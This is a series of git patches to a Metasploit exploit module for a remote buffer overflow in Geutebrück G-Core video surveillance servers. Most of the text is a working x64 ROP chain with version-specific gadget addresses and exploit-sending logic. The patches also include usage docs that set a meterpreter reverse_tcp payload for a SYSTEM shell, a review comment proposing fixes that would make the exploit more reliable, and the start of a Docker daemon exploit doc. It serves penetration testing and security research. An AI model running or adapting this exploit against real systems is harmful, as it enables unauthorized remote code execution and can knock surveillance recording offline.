'1.4.2.37' - print_status('Preparing ROP chain for target 1.4.2.37!') + elsif target.name.include? '1.4.2.37' + print_status('Preparing ROP chain for target 1.4.2.37!') - # 0x140cd9759 | add rsp, 0x10 ; ret - # This is needed because the next 16 bytes are sometimes messed up. - overwrite = [0x140cd9759].pack('Q<') + # 0x140cd9759 | add rsp, 0x10 ; ret + # This is needed because the next 16 bytes are sometimes messed up. + overwrite = [0x140cd9759].pack('Q<') - # These bytes "\x43" are sacrificed ; we align the stack to jump over this. - stack_align = "\x43" * 16 + # These bytes "\x43" are sacrificed ; we align the stack to jump over this. + stack_align = "\x43" * 16 - # We have 40 bytes left to align our stack! - # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations - # and to restore it. - # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. + # We have 40 bytes left to align our stack! 
+ # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations + # and to restore it. + # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. - # 0x1404f213f: mov edx, esp ; ret - stack_align += [0x1404f213f].pack('Q<') + # 0x1404f213f: mov edx, esp ; ret + stack_align += [0x1404f213f].pack('Q<') - # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. - # We pop -XXXXX as \xxxxxxxxx to rax - # 0x14000efa8 pop rax ; ret - stack_align += [0x14000efa8].pack('Q<') - stack_align += [0xFFFFFFFFFFFFF061].pack('Q<') + # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. + # We pop -XXXXX as \xxxxxxxxx to rax + # 0x14000efa8 pop rax ; ret + stack_align += [0x14000efa8].pack('Q<') + stack_align += [0xFFFFFFFFFFFFF061].pack('Q<') - # Our value is enough. - # 0x140cdfe65 | add rax,rdx ; ret - stack_align += [0x140cdfe65].pack('Q<') + # Our value is enough. + # 0x140cdfe65 | add rax,rdx ; ret + stack_align += [0x140cdfe65].pack('Q<') - # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back. - # 0x140cf3110 | mov rsp, rax ; ..... ; ret - stack_align += [0x140cf3110].pack('Q<') + # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back. + # 0x140cf3110 | mov rsp, rax ; ..... ; ret + stack_align += [0x140cf3110].pack('Q<') - # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. 
- # We want RCX to hold the value for VP Argument "Address of Shellcode" - # 0x140ccb984 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; - rop = '' - rop += [0x140ccb984].pack('Q<') - rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; - # 0x14008f7ec | POP RDX; RETN - # 0x...1000 | Value for VP "Size of Memory" - rop += [0x14008f7ec].pack('Q<') - rop += [0x0000000000000400].pack('Q<') + # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. + # We want RCX to hold the value for VP Argument "Address of Shellcode" + # 0x140ccb984 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; + rop = '' + rop += [0x140ccb984].pack('Q<') + rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; + # 0x14008f7ec | POP RDX; RETN + # 0x...1000 | Value for VP "Size of Memory" + rop += [0x14008f7ec].pack('Q<') + rop += [0x0000000000000400].pack('Q<') - # 0x140a88f81: | POP R8; RET - # 0x...40 | Value for VP "Execute Permissions" - rop += [0x140a88f81].pack('Q<') - rop += [0x0000000000000040].pack('Q<') + # 0x140a88f81: | POP R8; RET + # 0x...40 | Value for VP "Execute Permissions" + rop += [0x140a88f81].pack('Q<') + rop += [0x0000000000000040].pack('Q<') - # 0x1400aa030 | POP R9; RET - # 0x... | Value for VP "Writeable location". Not sure if needed? - # 0x140FB5000 is the .data section of gcore; let's test with this writable section... - rop += [0x1400aa030].pack('Q<') - rop += [0x140FB5000].pack('Q<') + # 0x1400aa030 | POP R9; RET + # 0x... | Value for VP "Writeable location". Not sure if needed? + # 0x140FB5000 is the .data section of gcore; let's test with this writable section... 
+ rop += [0x1400aa030].pack('Q<') + rop += [0x140FB5000].pack('Q<') - # 0x140ccea2f: xor rax, rax ; et - rop += [0x140ccea2f].pack('Q<') + # 0x140ccea2f: xor rax, rax ; et + rop += [0x140ccea2f].pack('Q<') - # 0x14000efa8 pop rax ; ret - # 0x140d83268 | VP Stub IAT Entry - rop += [0x14000efa8].pack('Q<') - rop += [0x140d83268].pack('Q<') + # 0x14000efa8 pop rax ; ret + # 0x140d83268 | VP Stub IAT Entry + rop += [0x14000efa8].pack('Q<') + rop += [0x140d83268].pack('Q<') - # 0x14095b254 mov rax, qword [rax] ; ret ; - rop += [0x14095b254].pack('Q<') + # 0x14095b254 mov rax, qword [rax] ; ret ; + rop += [0x14095b254].pack('Q<') - # 0x140166c46 push rax; ret - rop += [0x140166c46].pack('Q<') + # 0x140166c46 push rax; ret + rop += [0x140166c46].pack('Q<') - # 0x140cfb98d jmp rsp - rop += [0x140cfb98d].pack('Q<') + # 0x140cfb98d jmp rsp + rop += [0x140cfb98d].pack('Q<') - [rop, overwrite, stack_align] + [rop, overwrite, stack_align] - else - print_status('ROP chain for this version not (yet) available or the target is not vulnerable.') - - end - end - - def exploit - if target['auto'] - checkcode, target = fingerprint - if checkcode.to_s.include? 
'unknown' - print_status('No vulnerable Version detected - exploit aborted.') - else - target_rop, target_overwrite, target_stack_align = ropchain(target) - begin - connect - print_status('Crafting Exploit...') - - http_req = 'GET /' - buffer_200 = "\x41" * 200 - rop = target_rop - payload.encoded - buffer_1823 = "\x41" * 1823 - overwrite = target_overwrite - stack_align = target_stack_align - - exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align - print_status('Exploit ready for sending...') - sock.put(exploit, 'Timeout' => 20) - print_status('Exploit sent!') - buf = sock.get_once || '' - rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e - elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") - ensure - print_status('Closing socket.') - disconnect - end - end - - else - print_status('No auto detection - be sure to choose the right version! Otherwise the service will crash, the system reboots and leaves the surveillance software in an undefined status.') - print_status("Selected version: #{self.target.name}") - target_rop, target_overwrite, target_stack_align = ropchain(self.target) - begin - connect - print_status('Crafting Exploit...') - - http_req = 'GET /' - buffer_200 = "\x41" * 200 - rop = target_rop - payload.encoded - buffer_1823 = "\x41" * 1823 - overwrite = target_overwrite - stack_align = target_stack_align - - exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align - print_status('Exploit ready for sending...') - sock.put(exploit, 'Timeout' => 20) - print_status('Exploit sent!') - buf = sock.get_once || '' - rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e - elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") - ensure - print_status('Closing socket.') - disconnect - end 
+ else + print_status('ROP chain for this version not (yet) available or the target is not vulnerable.') end end -end + + def exploit + if target['auto'] + checkcode, target = fingerprint + if checkcode.to_s.include? 'unknown' + print_status('No vulnerable Version detected - exploit aborted.') + else + target_rop, target_overwrite, target_stack_align = ropchain(target) + begin + connect + print_status('Crafting Exploit...') + + http_req = 'GET /' + buffer_200 = "\x41" * 200 + rop = target_rop + payload.encoded + buffer_1823 = "\x41" * 1823 + overwrite = target_overwrite + stack_align = target_stack_align + + exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align + print_status('Exploit ready for sending...') + sock.put(exploit, 'Timeout' => 20) + print_status('Exploit sent!') + buf = sock.get_once || '' + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") + ensure + print_status('Closing socket.') + disconnect + end + end + + else + print_status('No auto detection - be sure to choose the right version! 
Otherwise the service will crash, the system reboots and leaves the surveillance software in an undefined status.') + print_status("Selected version: #{self.target.name}") + target_rop, target_overwrite, target_stack_align = ropchain(self.target) + begin + connect + print_status('Crafting Exploit...') + + http_req = 'GET /' + buffer_200 = "\x41" * 200 + rop = target_rop + payload.encoded + buffer_1823 = "\x41" * 1823 + overwrite = target_overwrite + stack_align = target_stack_align + + exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align + print_status('Exploit ready for sending...') + sock.put(exploit, 'Timeout' => 20) + print_status('Exploit sent!') + buf = sock.get_once || '' + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") + ensure + print_status('Closing socket.') + disconnect + end + + end + end + end From 7fe750422edc9f17dfb2f90f0583a43bca8f238d Mon Sep 17 00:00:00 2001 From: M4P0 Date: Fri, 6 Oct 2017 15:41:12 +0200 Subject: [PATCH 019/254] Update geutebrueck_gcore_x64_rce_bo.md --- .../exploit/windows/http/geutebrueck_gcore_x64_rce_bo.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/windows/http/geutebrueck_gcore_x64_rce_bo.md b/documentation/modules/exploit/windows/http/geutebrueck_gcore_x64_rce_bo.md index 4aff5e18fb..895d792d03 100644 --- a/documentation/modules/exploit/windows/http/geutebrueck_gcore_x64_rce_bo.md +++ b/documentation/modules/exploit/windows/http/geutebrueck_gcore_x64_rce_bo.md 
@@ -10,7 +10,7 @@
 4. Start msfconsole
 5. Do: ```use [exploit/windows/http/geutebrueck_gcore_x64_rce_bo]```
 6. Do: ```set rhost ```
- 7. Do: ```set rport 13003``
+ 7. Do: ```set rport 13003```
 8. Do: ```set payload windows/x64/meterpreter/reverse_tcp```
 9. Do: ```exploit```
 10. You should get a shell as NT/SYSTEM.
@@ -60,4 +60,4 @@ msf exploit(geutebrueck_gcore_x64_rce_bo) > exploit
 meterpreter >
 ```
 ## Mitigation
-Geutebrück released a new Version and an update for the affected version which should be installed to fix the described vulnerabilities.
+Geutebrück released a new version and an update for the affected product which should be installed to fix the described vulnerabilities.
From 8d50c34e4bc702ace1cfea77481ff62634868048 Mon Sep 17 00:00:00 2001
From: Maurice Popp
Date: Sat, 7 Oct 2017 14:06:58 +0200
Subject: [PATCH 020/254] codefixing
---
 .../http/geutebrueck_gcore_x64_rce_bo.rb | 334 ++++++++----------
 1 file changed, 156 insertions(+), 178 deletions(-)
diff --git a/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
index 4fd1677713..3e621f2858 100644
--- a/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
+++ b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
@@ -40,197 +40,205 @@ class MetasploitModule < Msf::Exploit::Remote 'Privileged' => true, 'DisclosureDate' => 'Jan 24 2017', 'DefaultTarget' => 0)) - end - def fingerprint - print_status('Trying to fingerprint server with http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml...') - @doc = Nokogiri::XML(open('http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml')) - statistics = @doc.css('modulestate') - statistics.each do |x| - if (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.3.8.42') - mytarget = targets[1] - print_status("Vulnerable version detected: #{mytarget.name}") - return Exploit::CheckCode::Appears, mytarget - elsif (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.4.2.37') - mytarget = targets[2] - print_status("Vulnerable version detected: #{mytarget.name}") - return Exploit::CheckCode::Appears, mytarget + register_options( + [ + Opt::RPORT(13003) + ]) end - end - print_status('Statistics Page under http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml is not available.') - print_status("Make sure that you know the exact version, otherwise you'll knock out the service.") - print_status('In the default configuration the service will restart after 1 minute and after the third crash the server will reboot!') - print_status('After a crash, the videosurveillance system can not recover properly and stops recording.') - [Exploit::CheckCode::Unknown, nil] - end - def check - fingerprint - end + def fingerprint + print_status("Trying to fingerprint server with http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml...") + @doc = Nokogiri::XML(open("http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml")) + statistics = @doc.css('modulestate') + statistics.each do |x| + if (x.to_s.include? 'GCoreServer') && (x.to_s.include? 
'1.3.8.42') + mytarget = targets[1] + print_status("Vulnerable version detected: #{mytarget.name}") + return Exploit::CheckCode::Appears, mytarget + elsif (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.4.2.37') + mytarget = targets[2] + print_status("Vulnerable version detected: #{mytarget.name}") + return Exploit::CheckCode::Appears, mytarget + end + end + print_status("Statistics Page under http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml is not available.") + print_status('Make sure that you know the exact version, otherwise you\'ll knock out the service.') + print_status('In the default configuration the service will restart after 1 minute and after the third crash the server will reboot!') + print_status('After a crash, the videosurveillance system can not recover properly and stops recording.') + [Exploit::CheckCode::Unknown, nil] + end - def ropchain(target) - if target.name.include? '1.3.8.42' - print_status('Preparing ROP chain for target 1.3.8.42!') + def check + fingerprint + end - # 0x140cd00a9 | add rsp, 0x10 ; ret - # This is needed because the next 16 bytes are sometimes messed up. - overwrite = [0x140cd00a9].pack('Q<') + def ropchain(target) + if target.name.include? '1.3.8.42' + print_status('Preparing ROP chain for target 1.3.8.42!') - # These bytes "\x43" are sacrificed ; we align the stack to jump over this messed up crap. - stack_align = "\x43" * 16 + # 0x140cd00a9 | add rsp, 0x10 ; ret + # This is needed because the next 16 bytes are sometimes messed up. + overwrite = [0x140cd00a9].pack('Q<') - # We have 40 bytes left to align our stack! - # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations - # and to restore it. - # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. + # These bytes "\x43" are sacrificed ; we align the stack to jump over this messed up crap. 
+ stack_align = "\x43" * 16 - # 0x1404e5cbf: mov edx, esp ; ret - stack_align += [0x1404e5cbf].pack('Q<') + # We have 40 bytes left to align our stack! + # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations + # and to restore it. + # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. - # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. - # We pop -XXXXX as \xxxxxxxxx to rax - # 0x14013db94 pop rax ; ret - stack_align += [0x14013db94].pack('Q<') - stack_align += [0xFFFFFFFFFFFFF061].pack('Q<') + # 0x1404e5cbf: mov edx, esp ; ret + stack_align += [0x1404e5cbf].pack('Q<') - # Our value is enough. - # 0x1407dc547 | add rax,rdx ; ret - stack_align += [0x1407dc547].pack('Q<') + # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. + # We pop -XXXXX as \xxxxxxxxx to rax + # 0x14013db94 pop rax ; ret + stack_align += [0x14013db94].pack('Q<') + stack_align += [0xFFFFFFFFFFFFF061].pack('Q<') - # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back. - # 0x140ce9ac0 | mov rsp, rax ; ..... ; ret - stack_align += [0x140ce9ac0].pack('Q<') + # Our value is enough. + # 0x1407dc547 | add rax,rdx ; ret + stack_align += [0x1407dc547].pack('Q<') - # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. 
- # We want RCX to hold the value for VP Argument "Address of Shellcode" - # 0x140cc2234 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; - rop = '' - rop += [0x140cc2234].pack('Q<') - rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; - # 0x1400ae2ae | POP RDX; RETN - # 0x...1000 | Value for VP "Size of Memory" - rop += [0x1400ae2ae].pack('Q<') - rop += [0x0000000000000400].pack('Q<') + # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back. + # 0x140ce9ac0 | mov rsp, rax ; ..... ; ret + stack_align += [0x140ce9ac0].pack('Q<') - # 0x14029dc6e: | POP R8; RET - # 0x...40 | Value for VP "Execute Permissions" - rop += [0x14029dc6e].pack('Q<') - rop += [0x0000000000000040].pack('Q<') + # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. + # We want RCX to hold the value for VP Argument "Address of Shellcode" + # 0x140cc2234 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; + rop = '' + rop += [0x140cc2234].pack('Q<') + rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; + # 0x1400ae2ae | POP RDX; RETN + # 0x...1000 | Value for VP "Size of Memory" + rop += [0x1400ae2ae].pack('Q<') + rop += [0x0000000000000400].pack('Q<') - # 0x1400aa030 | POP R9; RET - # 0x1409AE1A8 is the .data section of gcore - rop += [0x1400aa030].pack('Q<') - rop += [0x1409AE1A8].pack('Q<') + # 0x14029dc6e: | POP R8; RET + # 0x...40 | Value for VP "Execute Permissions" + rop += [0x14029dc6e].pack('Q<') + rop += [0x0000000000000040].pack('Q<') - # 0x140b5927a: xor rax, rax ; ret - rop += [0x140b5927a].pack('Q<') + # 0x1400aa030 | POP R9; RET + # 0x1409AE1A8 is the .data section of gcore + rop += [0x1400aa030].pack('Q<') + rop += [0x1409AE1A8].pack('Q<') - # 0x1402ce220 pop rax ; ret - # 0x140d752b8 | VP Stub IAT Entry - rop += [0x1402ce220].pack('Q<') - rop += 
[0x140d752b8].pack('Q<') + # 0x140b5927a: xor rax, rax ; ret + rop += [0x140b5927a].pack('Q<') - # 0x1407c6b3b mov rax, qword [rax] ; ret ; - rop += [0x1407c6b3b].pack('Q<') + # 0x1402ce220 pop rax ; ret + # 0x140d752b8 | VP Stub IAT Entry + rop += [0x1402ce220].pack('Q<') + rop += [0x140d752b8].pack('Q<') - # 0x140989c41 push rax; ret - rop += [0x140989c41].pack('Q<') + # 0x1407c6b3b mov rax, qword [rax] ; ret ; + rop += [0x1407c6b3b].pack('Q<') - # 0x1406d684d jmp rsp - rop += [0x1406d684d].pack('Q<') + # 0x140989c41 push rax; ret + rop += [0x140989c41].pack('Q<') - [rop, overwrite, stack_align] + # 0x1406d684d jmp rsp + rop += [0x1406d684d].pack('Q<') - elsif target.name.include? '1.4.2.37' - print_status('Preparing ROP chain for target 1.4.2.37!') + [rop, overwrite, stack_align] - # 0x140cd9759 | add rsp, 0x10 ; ret - # This is needed because the next 16 bytes are sometimes messed up. - overwrite = [0x140cd9759].pack('Q<') + elsif target.name.include? '1.4.2.37' + print_status('Preparing ROP chain for target 1.4.2.37!') - # These bytes "\x43" are sacrificed ; we align the stack to jump over this. - stack_align = "\x43" * 16 + # 0x140cd9759 | add rsp, 0x10 ; ret + # This is needed because the next 16 bytes are sometimes messed up. + overwrite = [0x140cd9759].pack('Q<') - # We have 40 bytes left to align our stack! - # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations - # and to restore it. - # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. + # These bytes "\x43" are sacrificed ; we align the stack to jump over this. + stack_align = "\x43" * 16 - # 0x1404f213f: mov edx, esp ; ret - stack_align += [0x1404f213f].pack('Q<') + # We have 40 bytes left to align our stack! + # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations + # and to restore it. + # We save RSP to RDX. 
Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. - # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. - # We pop -XXXXX as \xxxxxxxxx to rax - # 0x14000efa8 pop rax ; ret - stack_align += [0x14000efa8].pack('Q<') - stack_align += [0xFFFFFFFFFFFFF061].pack('Q<') + # 0x1404f213f: mov edx, esp ; ret + stack_align += [0x1404f213f].pack('Q<') - # Our value is enough. - # 0x140cdfe65 | add rax,rdx ; ret - stack_align += [0x140cdfe65].pack('Q<') + # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. + # We pop -XXXXX as \xxxxxxxxx to rax + # 0x14000efa8 pop rax ; ret + stack_align += [0x14000efa8].pack('Q<') + stack_align += [0xFFFFFFFFFFFFF061].pack('Q<') - # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back. - # 0x140cf3110 | mov rsp, rax ; ..... ; ret - stack_align += [0x140cf3110].pack('Q<') + # Our value is enough. + # 0x140cdfe65 | add rax,rdx ; ret + stack_align += [0x140cdfe65].pack('Q<') - # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. - # We want RCX to hold the value for VP Argument "Address of Shellcode" - # 0x140ccb984 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; - rop = '' - rop += [0x140ccb984].pack('Q<') - rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; - # 0x14008f7ec | POP RDX; RETN - # 0x...1000 | Value for VP "Size of Memory" - rop += [0x14008f7ec].pack('Q<') - rop += [0x0000000000000400].pack('Q<') + # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back. + # 0x140cf3110 | mov rsp, rax ; ..... 
; ret + stack_align += [0x140cf3110].pack('Q<') - # 0x140a88f81: | POP R8; RET - # 0x...40 | Value for VP "Execute Permissions" - rop += [0x140a88f81].pack('Q<') - rop += [0x0000000000000040].pack('Q<') + # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. + # We want RCX to hold the value for VP Argument "Address of Shellcode" + # 0x140ccb984 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; + rop = '' + rop += [0x140ccb984].pack('Q<') + rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; + # 0x14008f7ec | POP RDX; RETN + # 0x...1000 | Value for VP "Size of Memory" + rop += [0x14008f7ec].pack('Q<') + rop += [0x0000000000000400].pack('Q<') - # 0x1400aa030 | POP R9; RET - # 0x... | Value for VP "Writeable location". Not sure if needed? - # 0x140FB5000 is the .data section of gcore; let's test with this writable section... - rop += [0x1400aa030].pack('Q<') - rop += [0x140FB5000].pack('Q<') + # 0x140a88f81: | POP R8; RET + # 0x...40 | Value for VP "Execute Permissions" + rop += [0x140a88f81].pack('Q<') + rop += [0x0000000000000040].pack('Q<') - # 0x140ccea2f: xor rax, rax ; et - rop += [0x140ccea2f].pack('Q<') + # 0x1400aa030 | POP R9; RET + # 0x... | Value for VP "Writeable location". Not sure if needed? + # 0x140FB5000 is the .data section of gcore; let's test with this writable section... 
+ rop += [0x1400aa030].pack('Q<') + rop += [0x140FB5000].pack('Q<') - # 0x14000efa8 pop rax ; ret - # 0x140d83268 | VP Stub IAT Entry - rop += [0x14000efa8].pack('Q<') - rop += [0x140d83268].pack('Q<') + # 0x140ccea2f: xor rax, rax ; et + rop += [0x140ccea2f].pack('Q<') - # 0x14095b254 mov rax, qword [rax] ; ret ; - rop += [0x14095b254].pack('Q<') + # 0x14000efa8 pop rax ; ret + # 0x140d83268 | VP Stub IAT Entry + rop += [0x14000efa8].pack('Q<') + rop += [0x140d83268].pack('Q<') - # 0x140166c46 push rax; ret - rop += [0x140166c46].pack('Q<') + # 0x14095b254 mov rax, qword [rax] ; ret ; + rop += [0x14095b254].pack('Q<') - # 0x140cfb98d jmp rsp - rop += [0x140cfb98d].pack('Q<') + # 0x140166c46 push rax; ret + rop += [0x140166c46].pack('Q<') - [rop, overwrite, stack_align] + # 0x140cfb98d jmp rsp + rop += [0x140cfb98d].pack('Q<') - else - print_status('ROP chain for this version not (yet) available or the target is not vulnerable.') + [rop, overwrite, stack_align] - end - end + else + print_status('ROP chain for this version not (yet) available or the target is not vulnerable.') + + end + end + + def exploit + if target['auto'] + checkcode, self.target = fingerprint + fail_with(Failure::NotVulnerable, 'No vulnerable Version detected - exploit aborted.') if checkcode.to_s.include? 'unknown' + target_rop, target_overwrite, target_stack_align = ropchain(target) + else + print_status('No auto detection - be sure to choose the right version! Otherwise the service will crash, the system reboots and leaves the surveillance software in an undefined status.') + print_status("Selected version: #{self.target.name}") + target_rop, target_overwrite, target_stack_align = ropchain(self.target) + end - def exploit - if target['auto'] - checkcode, target = fingerprint - if checkcode.to_s.include? 
'unknown' - print_status('No vulnerable Version detected - exploit aborted.') - else - target_rop, target_overwrite, target_stack_align = ropchain(target) begin connect print_status('Crafting Exploit...') - http_req = 'GET /' buffer_200 = "\x41" * 200 rop = target_rop @@ -251,35 +259,5 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end end - - else - print_status('No auto detection - be sure to choose the right version! Otherwise the service will crash, the system reboots and leaves the surveillance software in an undefined status.') - print_status("Selected version: #{self.target.name}") - target_rop, target_overwrite, target_stack_align = ropchain(self.target) - begin - connect - print_status('Crafting Exploit...') - - http_req = 'GET /' - buffer_200 = "\x41" * 200 - rop = target_rop - payload.encoded - buffer_1823 = "\x41" * 1823 - overwrite = target_overwrite - stack_align = target_stack_align - - exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align - print_status('Exploit ready for sending...') - sock.put(exploit, 'Timeout' => 20) - print_status('Exploit sent!') - buf = sock.get_once || '' - rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e - elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") - ensure - print_status('Closing socket.') - disconnect - end - end end - end From b7184e87c075e29c3012a5c21119c8c58d5fad72 Mon Sep 17 00:00:00 2001 From: Maurice Popp Date: Sat, 7 Oct 2017 14:16:01 +0200 Subject: [PATCH 021/254] fixing a type --- modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb index 3e621f2858..e93adff0a2 100644 --- a/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb 
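Review bot: `fingerprint` still fetches the statistics page with open-uri's `open()` and no rescue, so when the page really is unavailable (connection refused, 404, timeout) the call raises `OpenURI::HTTPError`/`SystemCallError` straight out of `check` and `exploit`, and the 'Statistics Page ... is not available' branch with its crash/reboot warnings is only reached when the XML loads but lists no known GCoreServer version. Wrapping the fetch, as below, makes the `CheckCode::Unknown` path reachable and lets the auto-target `fail_with` in `exploit` fire as intended; moving to the framework's HttpClient mixin (`send_request_cgi`) instead of open-uri would additionally honour proxy and timeout settings and avoids `Kernel#open` treating a `|`-prefixed string as a command, even though RHOST is operator-supplied here. In `exploit`, `checkcode.to_s.include? 'unknown'` only works because `CheckCode::Unknown` stringifies to an array containing that word; `checkcode == Exploit::CheckCode::Unknown` states the intent directly. The `else` branch of `ropchain` returns the `nil` from `print_status`, so a target whose name matches neither version would later blow up on `nil + payload.encoded`; a `fail_with(Failure::NoTarget, ...)` there is safer.
```ruby
def fingerprint
  uri = "http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml"
  print_status("Trying to fingerprint server with #{uri}...")
  begin
    @doc = Nokogiri::XML(open(uri))
  rescue OpenURI::HTTPError, SocketError, SystemCallError, Timeout::Error => e
    print_status("Statistics Page under #{uri} is not available (#{e.class}: #{e.message}).")
    # … unchanged: the three crash/restart/reboot warnings …
    return Exploit::CheckCode::Unknown, nil
  end
  # … unchanged: modulestate loop matching 1.3.8.42 / 1.4.2.37 …
end
```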
+++ b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb @@ -260,4 +260,3 @@ class MetasploitModule < Msf::Exploit::Remote end end end - end From d8ff99b1f65e60c806f31a9ce6af01049a000f04 Mon Sep 17 00:00:00 2001 From: Martin Pizala Date: Sun, 8 Oct 2017 13:51:07 +0200 Subject: [PATCH 022/254] Change to ARCH_X64, remove python dependency --- .../exploit/linux/http/docker_daemon_tcp.md | 15 +++++----- .../exploits/linux/http/docker_daemon_tcp.rb | 30 +++++++------------ 2 files changed, 17 insertions(+), 28 deletions(-) diff --git a/documentation/modules/exploit/linux/http/docker_daemon_tcp.md b/documentation/modules/exploit/linux/http/docker_daemon_tcp.md index 4c32e54a03..a76ab1ea28 100644 --- a/documentation/modules/exploit/linux/http/docker_daemon_tcp.md +++ b/documentation/modules/exploit/linux/http/docker_daemon_tcp.md @@ -88,8 +88,8 @@ to gain root access to the hosting server of the Docker container. msf > use exploit/linux/http/docker_daemon_tcp msf exploit(docker_daemon_tcp) > set RHOST 192.168.66.23 RHOST => 192.168.66.23 -msf exploit(docker_daemon_tcp) > set PAYLOAD python/meterpreter/reverse_tcp -PAYLOAD => python/meterpreter/reverse_tcp +msf exploit(docker_daemon_tcp) > set PAYLOAD linux/x64/meterpreter/reverse_tcp +PAYLOAD => linux/x64/meterpreter/reverse_tcp msf exploit(docker_daemon_tcp) > set LHOST 192.168.66.10 LHOST => 192.168.66.10 msf exploit(docker_daemon_tcp) > 